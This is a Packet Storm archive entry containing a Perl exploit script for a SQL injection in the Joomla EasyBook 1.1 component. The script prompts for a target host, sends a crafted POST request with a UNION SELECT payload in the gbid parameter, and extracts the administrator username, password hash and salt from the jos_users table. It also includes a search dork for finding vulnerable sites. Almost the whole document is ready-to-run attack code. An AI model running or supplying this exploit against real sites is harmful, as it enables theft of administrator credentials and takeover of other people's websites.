joomlaeasy-sql.txt

2008-06-05T00:00:00
ID PACKETSTORM:67007
Type packetstorm
Reporter ZAMUT
Modified 2008-06-05T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
use IO::Socket;  
use strict;  
  
##### INFO##############################  
# Example: #  
# Host: xxx.lu #  
# &md: 0f8ab366793a0d1da85c6f5a8d4fb576#  
########################################  
  
  
print "-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+-\n";  
print "-+-- --+-\n";  
print "-+-- Author: ZAMUT --+-\n";  
print "-+-- Vuln: gbid= --+-\n";  
print "-+-- Homepage: http://antichat.ru --+-\n";  
print "-+-- Dork: com_easybook --+-\n\n";  
  
print "Host:" ;  
chomp(my $host=<STDIN>);  
print "&md=";  
chomp(my $md=<STDIN>);  
  
my ($socket,$lhs,$l,$h,$s);  
$socket = IO::Socket::INET->new("$host:80") || die("Can't connecting!");  
print $socket "POST /index.php HTTP/1.0\n".  
"Host: www.$host\n".  
"Content-Type: application/x-www-form-urlencoded\n".  
"Content-Length: 214\n\n".  
"option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=$md\n";  
while(<$socket>)  
{  
$s = <$socket>;  
if($s=~/:::(.+):::/){  
$lhs = $1;  
($l,$h,$s)=split(':',$lhs);  
print "\nAdmin Login:$l\nHash:$h\nSalt:$s\n";  
close $socket;   
exit; }  
}  
die ("Exploit failed!");  
  
`